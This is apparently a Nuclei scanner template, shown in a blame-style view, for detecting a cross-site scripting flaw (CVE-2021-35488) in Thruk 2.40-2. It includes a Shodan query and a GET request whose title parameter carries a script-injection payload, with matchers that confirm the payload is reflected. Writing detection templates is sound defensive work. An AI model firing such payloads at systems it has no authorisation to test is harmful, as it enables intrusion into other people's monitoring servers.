nuclei-templates/http/cves/2021/CVE-2021-35488.yaml

47 lines
1.5 KiB
YAML
Raw Normal View History

2022-08-14 21:31:30 +00:00
id: CVE-2021-35488
info:
name: Thruk 2.40-2 - Cross-Site Scripting
2022-08-14 21:31:30 +00:00
author: arafatansari
severity: medium
2022-08-14 21:31:30 +00:00
description: |
Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability.
2022-08-14 21:31:30 +00:00
reference:
- https://www.gruppotim.it/redteam
- https://www.thruk.org/changelog.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-35488
2022-08-15 06:34:19 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-08-15 06:34:19 +00:00
cve-id: CVE-2021-35488
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00145
2023-10-14 11:27:55 +00:00
epss-percentile: 0.50014
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:*
2022-08-14 21:31:30 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: thruk
product: thruk
2023-09-06 12:09:01 +00:00
shodan-query: http.html:"Thruk"
2022-08-15 06:34:19 +00:00
tags: cve,cve2021,thruk,xss
2022-08-14 21:31:30 +00:00
http:
2022-08-14 21:31:30 +00:00
- method: GET
path:
2022-08-15 06:34:19 +00:00
- "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-08-14 21:31:30 +00:00
matchers-condition: and
matchers:
2022-08-15 06:34:19 +00:00
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
- "Thruk Monitoring"
condition: and
2022-08-14 21:31:30 +00:00
- type: status
status:
- 401